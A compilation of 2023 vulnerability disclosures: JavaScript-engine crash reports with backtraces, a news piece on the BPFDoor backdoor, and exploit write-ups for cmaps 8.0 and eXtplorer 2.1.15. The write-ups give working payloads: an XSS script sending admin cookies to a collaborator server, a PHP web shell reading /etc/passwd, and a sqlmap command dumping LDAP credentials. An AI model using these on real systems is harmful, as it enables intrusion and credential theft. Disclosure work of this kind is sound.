QuickJS commit 2788d71 was discovered to contain a stack-overflow via the component js_proxy_isArray at quickjs.c.

**QuickJS Version**

Version : 2788d71

**platform**

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86\_64)

**Build**

*   Address Sanitizer=On
*   Debug (and Release)

**PoC**testcase

Array . isArray ( \[ \] ) ; Array . isArray ( { } ) , Array . isArray ( null ) , Array . isArray ( 0 ) , Array . isArray ( 0.1 ) , Array . isArray ( " " ) , Array . isArray ( void 0 ) , Array . isArray ( new Proxy ( \[ \] , { } ) ) , Array . isArray ( new Proxy ( { } , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( \[ \] , { } ) , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( { } , { } ) , { } ) ) ; for ( var r \= new Proxy ( \[ \] , { } ) , y \= 0 ; y < 131072 ; y ++ ) r \= new Proxy ( r , { } ) ; Array . isArray ( r ) , RangeError ;

// poc.js
for (var r \= new Proxy (\[\],{}) , y \= 0 ; y < 131072 ; y ++ ) 
    r \= new Proxy (r, {}); 
Array . isArray (r);

**Execution steps & Output**

The js\_proxy\_isArray() function and the JS\_IsArray() function are calling each other recursively.  
infinite loop occurs here.

    $ ./qjs poc.js
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==2347865==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcfb766fd8 (pc 0x557e466f5b94 bp 0x7ffcfb767110 sp 0x7ffcfb766fd8 T0)
        #0 0x557e466f5b93 in js_proxy_isArray ./quickjs/quickjs.c:45242
        #1 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
        #2 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
        #3 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
        #4 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
        #5 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
        ...
        #491 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
        #492 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
        #493 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
        #494 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
        #495 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
        #496 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    
    SUMMARY: AddressSanitizer: stack-overflow ./quickjs/quickjs.c:45242 in js_proxy_isArray
    ==2347865==ABORTING
    

Credits: @Ye0nny, @EJueon of the seclab-yonsei.

CVE-2023-31922: AddressSanitizer: stack-overflow · Issue #178 · bellard/quickjs

Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the jcontext_raise_exception at jerry-core/jcontext/jcontext.c.

**JerryScript revision**

Commit: 05dbbd1  
Version: v3.0.0

**Build platform**

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

**Test case**

// poc.js
var t \= Function ( ) ; 
t \[ Symbol . species \] \= Object ; 
var e \= new Proxy ( { constructor : t  } , { set : function ( ) { } }  ) ; 
RegExp . prototype \[ Symbol . matchAll \] . call ( e ) ; 

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion '!jcontext\_has\_pending\_exception ()' failed at /jerryscript/jerry-core/jcontext/jcontext.c(jcontext\_raise\_exception):88.
Error: JERRY\_FATAL\_FAILED\_ASSERTION
Aborted (core dumped)

**Backtrace**

    (gdb) #0  0xf7f40d99 in __kernel_vsyscall ()                                                                            
    #1  0xf7c15276 in raise () from /lib32/libc.so.6                                                                        
    #2  0xf7bfd3f7 in abort () from /lib32/libc.so.6                                                                        
    #3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)                                                  
        at /jerryscript/jerry-port/common/jerry-port-process.c:29                              
    #4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)                                                       
        at /jerryscript/jerry-core/jrt/jrt-fatals.c:63                                         
    #5  0x08260d64 in jerry_assert_fail (                                                                                   
        assertion=0x8434bc0 <str> "!jcontext_has_pending_exception ()",                                                     
        file=0x8434b00 <str> "/jerryscript/jerry-core/jcontext/jcontext.c",                    
        function=0x8434c20 <__func__.jcontext_raise_exception> "jcontext_raise_exception", line=88)                         
        at /jerryscript/jerry-core/jrt/jrt-fatals.c:83                                         
    #6  0x0825e7b0 in jcontext_raise_exception (error=4115661203)                                                           
        at /jerryscript/jerry-core/jcontext/jcontext.c:88    
    #7  0x081f52e5 in ecma_raise_standard_error (error_type=JERRY_ERROR_SYNTAX, [0/1762]
        msg=ECMA_ERR_INVALID_REGEXP_FLAGS)    at /jerryscript/jerry-core/ecma/operations/ecma-exceptions.c:315#8  0x081f5a91 in ecma_raise_syntax_error (msg=ECMA_ERR_INVALID_REGEXP_FLAGS)
        at /jerryscript/jerry-core/ecma/operations/ecma-exceptions.c:456
    #9  0x08234ac7 in ecma_regexp_parse_flags (flags_str_p=<optimized out>, 
        flags_p=<optimized out>)
        at /jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:115
    #10 0x0835e0d2 in ecma_builtin_regexp_prototype_match_all (
        regexp_obj_p=0xffcd35c0, string_arg=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:504
    #11 ecma_builtin_regexp_prototype_dispatch_routine (
        builtin_routine_id=<optimized out>, this_arg=<optimized out>, 
        arguments_list_p=<optimized out>, arguments_number=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:598
    #12 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>, 
        this_arg_value=<optimized out>, arguments_list_p=0xffcd3690, 
        arguments_list_len=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
    #13 ecma_builtin_dispatch_call (obj_p=<optimized out>, 
        this_arg_value=<optimized out>, arguments_list_p=<optimized out>, 
        arguments_list_len=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
    #14 0x081fb6b8 in ecma_op_function_call_native_built_in (
        func_obj_p=0xf55004c0, this_arg_value=4115662259, 
        arguments_list_p=0xffcd38d4, arguments_list_len=0)
        at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
    #15 0x081fa81d in ecma_op_function_call (func_obj_p=0xf55004c0, 
        this_arg_value=4115662259, arguments_list_p=0xffcd38d4,  
        arguments_list_len=0)
        at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
    #16 0x0833172e in ecma_builtin_function_prototype_object_call (
        func_obj_p=0xf55004c0, arguments_list_p=0xffcd38d0, 
        arguments_number=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-function-prototype.c:288
    #17 ecma_builtin_function_prototype_dispatch_routine (
        builtin_routine_id=<optimized out>, this_arg=<optimized out>, 
        arguments_list_p=<optimized out>, arguments_number=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-function-prototype.c:529
    #18 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>, 
        this_arg_value=<optimized out>, arguments_list_p=0xffcd38d0, 
        arguments_list_len=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
    #19 ecma_builtin_dispatch_call (obj_p=<optimized out>, 
        this_arg_value=<optimized out>, arguments_list_p=<optimized out>, 
        arguments_list_len=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
    #20 0x081fb6b8 in ecma_op_function_call_native_built_in (
        func_obj_p=0xf5500460, this_arg_value=4115662019, 
        arguments_list_p=0xffcd3af4, arguments_list_len=1)
        at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
    #21 0x081fa81d in ecma_op_function_call (func_obj_p=0xf5500460, 
        this_arg_value=4115662019, arguments_list_p=0xffcd3af4,  
        arguments_list_len=1)
        at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
    #22 0x081fa5cf in ecma_op_function_validated_call (callee=4115661923, 
        this_arg_value=4115662019, arguments_list_p=0xffcd3af4,  
        arguments_list_len=1)
        at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
    #23 0x082d7631 in opfunc_call (frame_ctx_p=<optimized out>)
        at /jerryscript/jerry-core/vm/vm.c:758
    #24 vm_execute (frame_ctx_p=0xffcd3ac0)
        at /jerryscript/jerry-core/vm/vm.c:5217
    #25 0x082d4f62 in vm_run (shared_p=0xffcd3bb0, this_binding_value=4119870595, 
        lex_env_p=0xf57007b0)
        at /jerryscript/jerry-core/vm/vm.c:5312
    #26 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>,  
        function_object_p=<optimized out>)
        at /jerryscript/jerry-core/vm/vm.c:286
    #27 0x0812a4e5 in jerry_run (script=4115663075)
        at /jerryscript/jerry-core/api/jerryscript.c:548
    #28 0x083eac3f in jerryx_source_exec_script (path_p=0xffcd5235 "test.js")
        at /jerryscript/jerry-ext/util/sources.c:68
    #29 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
        at /jerryscript/jerry-main/main-desktop.c:156
    (gdb) quit                                
    

credits: @EJueon, @Ye0nny of the seclab-yonsei.

CVE-2023-31919: Assertion '!jcontext_has_pending_exception ()' failed at /jerryscript/jerry-core/jcontext/jcontext.c(jcontext_raise_exception):88. · Issue #5069 · jerryscript-project/jerryscript

Jerryscript 3.0 (commit 1a2c047) was discovered to contain an Assertion Failure via the parser_parse_function_arguments at jerry-core/parser/js/js-parser.c.

**JerryScript revision**

Commit: 1a2c047  
Version: v3.0.0

**Build platform**

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

**Test case**

// poc.js
class C { async#\* method ( 

**Execution steps & Output**

    $ ./jerryscript/build/bin/jerry poc.js
    ICE: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1587.
    Error: JERRY_FATAL_FAILED_ASSERTION
    Aborted
    

**Backtrace**

    #0  0xf7fcfd99 in __kernel_vsyscall ()
    #1  0xf7ca4276 in raise () from /lib32/libc.so.6
    #2  0xf7c8c3f7 in abort () from /lib32/libc.so.6
    #3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-port/common/jerry-port-process.c:29
    #4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-core/jrt/jrt-fatals.c:63
    #5  0x08260d64 in jerry_assert_fail (assertion=0x84433e0 <str> "context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION",
        file=0x8442ec0 <str> "jerryscript/jerry-core/parser/js/js-parser.c",
        function=0x8443440 <__func__.parser_parse_function_arguments> "parser_parse_function_arguments", line=1587)
        at jerryscript/jerry-core/jrt/jrt-fatals.c:83
    #6  0x0827592c in parser_parse_function_arguments (context_p=0xffffcd30, end_type=<optimized out>)
        at jerryscript/jerry-core/parser/js/js-parser.c:1587
    #7  0x0827240a in parser_parse_function (context_p=<optimized out>, status_flags=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser.c:2685
    #8  0x08399b84 in lexer_construct_function_object (context_p=0xffffcd30, extra_status_flags=34717702)
        at jerryscript/jerry-core/parser/js/js-lexer.c:2695
    #9  0x083a30d3 in parser_parse_class_body (context_p=<optimized out>, opts=<optimized out>, class_name_index=0)
        at jerryscript/jerry-core/parser/js/js-parser-expr.c:908
    #10 parser_parse_class (context_p=<optimized out>, is_statement=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser-expr.c:1110
    #11 0x083c9959 in parser_parse_statements (context_p=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser-statm.c:2787
    #12 0x08284a26 in parser_parse_source (source_p=0xffffd030, parse_opts=<optimized out>, options_p=0xffffd100)
        at jerryscript/jerry-core/parser/js/js-parser.c:2280
    #13 0x08282c70 in parser_parse_script (source_p=0xffffd030, parse_opts=0, options_p=0xffffd100) at jerryscript/jerry-core/parser/js/js-parser.c:3326
    #14 0x08129a7d in jerry_parse_common (source_p=0xffffd030, options_p=<optimized out>, parse_opts=0) at jerryscript/jerry-core/api/jerryscript.c:412
    #15 0x08129698 in jerry_parse (source_p=<optimized out>, source_size=<optimized out>, options_p=<optimized out>)
        at jerryscript/jerry-core/api/jerryscript.c:480
    #16 0x083ea952 in jerryx_source_parse_script (path_p=<optimized out>) at jerryscript/jerry-ext/util/sources.c:52
    #17 0x083eac12 in jerryx_source_exec_script (path_p=0xffffd5e0 "poc.js") at jerryscript/jerry-ext/util/sources.c:63
    #18 0x0812162d in main (argc=<optimized out>, argv=<optimized out>) at jerryscript/jerry-main/main-desktop.c:156
    

Credits:  
@Ye0nny, @EJueon of the seclab-yonsei.

CVE-2023-31918: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments) · Issue #5064 · jerryscript-project/je

Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_big_uint_div_mod at jerry-core/ecma/operations/ecma-big-uint.c.

**JerryScript revision**

Commit: 05dbbd1  
Version: v3.0.0

**Build platform**

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

**Test case**

// poc.js
var x \= BigInt ( 8 \*\* 16 + 1 ) ;  
x \*\* BigInt ( 4 ) / x; 

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'dividend\_end\_p\[0\] == divisor\_high && dividend\_end\_p\[-1\] < divisor\_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma\_big\_uint\_div\_mod):1119.
Error: JERRY\_FATAL\_FAILED\_ASSERTION
Aborted

**Backtrace**

    (gdb) #0  0xf7efdd99 in __kernel_vsyscall ()                                                                                                                                                                                                                                                                         
    #1  0xf7bd2276 in raise () from /lib32/libc.so.6                                                                                                                                                                                                                                                                     
    #2  0xf7bba3f7 in abort () from /lib32/libc.so.6                                                                                                                                                                                                                                                                     
    #3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)                                                                                                                                                                                                                                               
        at /jerryscript/jerry-port/common/jerry-port-process.c:29                                                                                                                                                                                                                           
    #4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)                                                                                                                                                                                                                                                    
        at /jerryscript/jerry-core/jrt/jrt-fatals.c:63                                                                                                                                                                                                                                      
    #5  0x08260d64 in jerry_assert_fail (                                                                                                                                                                                                                                                                                
        assertion=0x846e200 <str> "dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high",                                                                                                                                                                                                              
        file=0x846d800 <str> "/jerryscript/jerry-core/ecma/operations/ecma-big-uint.c",                                                                                                                                                                                                     
        function=0x846e080 <__func__.ecma_big_uint_div_mod> "ecma_big_uint_div_mod", line=1119)                                                                                                                                                                                                                          
        at /jerryscript/jerry-core/jrt/jrt-fatals.c:83                                                                                                                                                                                                                                      
    #6  0x08380b54 in ecma_big_uint_div_mod (dividend_value_p=0xf4203c40,                                                                                                                                                                                                                                                
        divisor_value_p=0xf5600630, is_mod=<optimized out>) 
        at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c:1119                                                                                                                                                                                                                     
    #7  0x081dfc96 in ecma_bigint_div_mod (left_value=4095753286, 
        right_value=4116710966, is_mod=<optimized out>)
        at /jerryscript/jerry-core/ecma/operations/ecma-bigint.c:1337                                                                                                                                                                                                                       
    #8  0x082be8b9 in do_number_arithmetic (op=<optimized out>, 
        left_value=<optimized out>, right_value=<optimized out>)
        at /jerryscript/jerry-core/vm/opcodes-ecma-arithmetics.c:148                                                                                                                                                                                                                        
    #9  0x082dd6f0 in vm_loop (frame_ctx_p=0xffdc12c0)
        at /jerryscript/jerry-core/vm/vm.c:3563
    #10 0x082d6b83 in vm_execute (frame_ctx_p=0xffdc12c0)
        at /jerryscript/jerry-core/vm/vm.c:5211
    #11 0x082d4f62 in vm_run (shared_p=0xffdc13d0, this_binding_value=4118822019,                                                                                                                                                                                                                                        
        lex_env_p=0xf56007b0)                                                    
        at /jerryscript/jerry-core/vm/vm.c:5312
    #12 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>, 
        function_object_p=<optimized out>)
        at /jerryscript/jerry-core/vm/vm.c:286
    #13 0x0812a4e5 in jerry_run (script=4114614595)
        at /jerryscript/jerry-core/api/jerryscript.c:548                                                                                                                                                                                                                                    
    #14 0x083eac3f in jerryx_source_exec_script (
        path_p=0xffdc21e7 "poc.js")                                                                                                                                                                                                                              
        at /jerryscript/jerry-ext/util/sources.c:68
    #15 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
        at /jerryscript/jerry-main/main-desktop.c:156                                                                                                                                                                                                                                       
    (gdb) quit                                                                   
    

credits: @EJueon, @Ye0nny of the seclab-yonsei.

CVE-2023-31921: Assertion 'dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma_big_uint_div_mod) · Issue #5068 · jerryscript-

Jerryscript 3.0 *commit 1a2c047) was discovered to contain an Assertion Failure via the component parser_parse_class at jerry-core/parser/js/js-parser-expr.c.

**JerryScript revision**

Commit: 1a2c047  
Version: v3.0.0

**Build platform**

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

**Test case**

// poc.js
class v0 { v1 \= class v2 {  } }

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'context\_p->scope\_stack\_size == PARSER\_MAXIMUM\_DEPTH\_OF\_SCOPE\_STACK' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser\_parse\_class):1068.
Error: JERRY\_FATAL\_FAILED\_ASSERTION
Aborted

Credits:  
@Ye0nny, @EJueon of the seclab-yonsei.

CVE-2023-31913: Assertion 'context_p->scope_stack_size == PARSER_MAXIMUM_DEPTH_OF_SCOPE_STACK' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class):1068. · Issue #5061 · jerryscript-project

A previously undocumented and mostly undetected variant of a Linux backdoor called BPFDoor has been spotted in the wild, cybersecurity firm Deep Instinct said in a technical report published this week.
"BPFDoor retains its reputation as an extremely stealthy and difficult-to-detect malware with this latest iteration," security researchers Shaul Vilkomir-Preisman and Eliran Nissan said.
BPFDoor (

A previously undocumented and mostly undetected variant of a Linux backdoor called **BPFDoor** has been spotted in the wild, cybersecurity firm Deep Instinct said in a technical report published this week.

"BPFDoor retains its reputation as an extremely stealthy and difficult-to-detect malware with this latest iteration," security researchers Shaul Vilkomir-Preisman and Eliran Nissan said.

BPFDoor (aka JustForFun), first documented by PwC and Elastic Security Labs in May 2022, is a passive Linux backdoor associated with a Chinese threat actor called Red Menshen (aka DecisiveArchitect or Red Dev 18), which is known to single out telecom providers across the Middle East and Asia since at least 2021.

The malware is specifically geared towards establishing persistent remote access to compromised target environments for extended periods of time, with evidence pointing to the hacking crew operating the backdoor undetected for years.

BPFDoor gets its name from the use of Berkeley Packet Filters (BPF) – a technology that makes it possible to analyze and filter network traffic in Linux systems – for network communications and process incoming commands.

In doing so, threat actors can penetrate a victim's system and execute arbitrary code without being detected by firewalls, while simultaneously filtering out unnecessary data.

Deep Instinct's findings come from a BPFDoor artifact that was uploaded to VirusTotal on February 8, 2023. As of writing, only three security vendors have flagged the ELF binary as malicious.

One of the key characteristics that make the new version of BPFDoor even more evasive is its removal of many hard-coded indicators and instead incorporating a static library for encryption (libtomcrypt) and a reverse shell for command-and-control (C2) communication.

Upon launch, BPFDoor is configured to ignore various operating system signals to prevent it from being terminated. It then allocates a memory buffer and creates a special packet sniffing socket that monitors for incoming traffic with a specific Magic Byte sequence by hooking a BPF filter onto the raw socket.

"When BPFdoor finds a packet containing its Magic Bytes in the filtered traffic, it will treat it as a message from its operator and will parse out two fields and will again fork itself," the researchers explained.

"The parent process will continue and monitor the filtered traffic coming through the socket while the child will treat the previously parsed fields as a command-and-control IP-Port combination and will attempt to contact it."

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

In the final stage, BPFDoor sets up an encrypted reverse shell session with the C2 server and awaits further instructions to be executed on the compromised machine.

The fact that BPFDoor has remained hidden for a long duration speaks to its sophistication, what with threat actors increasingly developing malware targeting Linux systems owing to their prevalence in enterprise and cloud environments.

The development comes as Google announced a new extended Berkeley Packet Filter (eBPF) fuzzing framework called Buzzer to help harden the Linux kernel and ensure that sandboxed programs that run in a privileged context are valid and safe.

The tech giant further said the testing method led to the discovery of a security flaw (CVE-2023-2163) that could be exploited to achieve arbitrary reading and writing of kernel memory.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Variant of Linux Backdoor BPFDoor Uncovered After Years of Staying Under the Radar

Cross Site Scripting vulnerability found in Maximilian Vogt cmaps v.8.0 allows a remote attacker to execute arbitrary code via the auditlog tab in the admin panel.

    # Exploit Title: Stored Cross Site Scripting# Google Dork:# Date: 27.04.2023# Exploit Author: Lucas Noki (0xPrototype)# Vendor Homepage: https://github.com/vogtmh# Software Link: https://github.com/vogtmh/cmaps# Version: 8.0# Tested on: Mac, Windows, Linux# CVE : CVE-2023-29983*Steps to reproduce:*1. Clone the repository and install the application2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameterIn a real world case you would need to wait for the admin to log into the application and open the auditlog tab.Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

CVE-2023-29983: CompanyMaps 8.0 Cross Site Scripting ≈ Packet Storm

eXtplorer 2.1.15 is vulnerable to Insecure Permissions. File upload in file manager allows uploading zip file containing php pages with arbitrary code executions.

**\# Title: eXtplorer 2.1.15 – Arbitrary File Upload Remote following Code Execution (Authenticated)  
**

Date: 2022-11-09  
Author: Francisco Marinho  
Vendor Homepage: http://extplorer.net/  
Software Link: http://extplorer.net/attachments/download/99/eXtplorer\_2.1.15.zip  
Version: 2.1.15  
Tested on: Linux

**\==========> POC <==========**

1- Login with your account  
2- Access the directory **/index.php**  
3- Create a home.php file containing <?php system($\_GET\[‘tristao’\]); ?>  
4- zip the file for home.zip  
5- Upload zip file for application  
6- Right click on the zip file home.zip and click extract file  
7- Go to http://exemple.com/home.php?tristao=id

  
Examples:  
**cat /etc/passwd**  
/index.php?tristao=c**at%20%20/etc/passwd**  
**cat ls -la**  
/index.php?tristao=**ls%20-la**

**Procedure**

http://tristaomarinho.com/home.php?tristao=id

http://tristaomarinho.com/home.php?tristao=ls%20-la

http://tristaomarinho.com/home.php?tristao=cat%20%20/etc/passwd

CVE-2023-29657: eXtplorer 2.1.15 – Arbitrary File Upload – Tristão Marinho

Cross Site Scripting (XSS) vulnerability in vogtmh cmaps (companymaps) 8.0 allows attackers to execute arbitrary code.

    # Exploit Title: Reflected Cross Site Scripting- Google Dork:- Date: 27.04.2023- Exploit Author: Lucas Noki (0xPrototype)- Vendor Homepage: https://github.com/vogtmh- Software Link: https://github.com/vogtmh/cmaps- Version: 8.0- Tested on: Mac, Windows, Linux- CVE : CVE-2023-29808*Description:*The vulnerability found is Reflected Cross Site Scripting. When the `/index.php?map=overview&findme=` endpoint is hit with a request where the "findme" parameter contains a malicious payload we have the possibility to perform an XSS attack. This happens because the input isn't sanitized.*Steps to reproduce:*1. Clone the repository and install the application2. Send a maliciously crafted payload via the "findme" parameter to the following endpoint: /index.php?map=overview&findme=3. The payload used is: ";alert(document.cookie)//4. Simply visiting the complete URL: http://IP/index.php?map=overview&findme=";alert(document.cookie)// is enough. Now an alertbox should pop up with your current cookie value. <img src="Screenshot 2023-05-03 at 17.56.59.png" alt="Screenshot 2023-05-03 at 17.56.59" style="zoom:50%;" />Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

CVE-2023-29808: Companymaps 8.0 Cross Site Scripting ≈ Packet Storm

SQL injection vulnerability found in Maximilian Vogt companymaps (cmaps) v.8.0 allows a remote attacker to execute arbitrary code via a crafted script in the request.

# Exploit Title: Unauthenticated SQL injection  
- Google Dork:  
- Date: 27.04.2023  
- Exploit Author: Lucas Noki (0xPrototype)  
- Vendor Homepage: https://github.com/vogtmh  
- Software Link: https://github.com/vogtmh/cmaps  
- Version: 8.0  
- Tested on: Mac, Windows, Linux  
- CVE : CVE-2023-29809

*Description:*

The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message:  
```html  
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />  
```

Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload:   
```  
'-(select*from(select+sleep(2)+from+dual)a)--+  
```

The page will sleep for two seconds. This confirms the SQL injection.

*Steps to reproduce:*

1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```

2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials.  
   ```shell  
   python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump  
   ```

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

## Request to the server:

<img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" />

## Response from the server:

Look at the response time.

<img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />

Tag

#linux